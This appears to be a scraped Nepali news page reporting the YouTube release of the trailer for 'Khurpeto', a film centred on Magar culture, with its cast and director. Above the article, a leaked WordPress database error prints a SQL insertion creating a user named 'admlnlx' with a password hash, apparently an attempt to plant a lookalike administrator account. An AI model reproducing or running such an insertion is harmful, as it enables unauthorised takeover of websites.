WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6UH6qQ6VTXW5XdFt7cA4eJwhztDZN.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:22:38', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ६-
मगर जातीको संस्कृतिलाई समेटेर निर्माण गरिएको पहिलो कथानक चलचित्र ‘खुर्पेटो’ को ट्रेलर सार्वजनिक भएको छ ।
मिनेट २५ सेकेन्ड लामो ट्रेलर युट्युबमार्फत सार्वजनिक गरिएको हो । चलचित्रमा लोकदोहोरी गायिका मुना थापा मगर, सुजन थापा, बिना थापा, टिका आले लगायतको अभिनय छ ।
चलचित्रलाई विकास मगरले निर्देशन गरेका छन् ।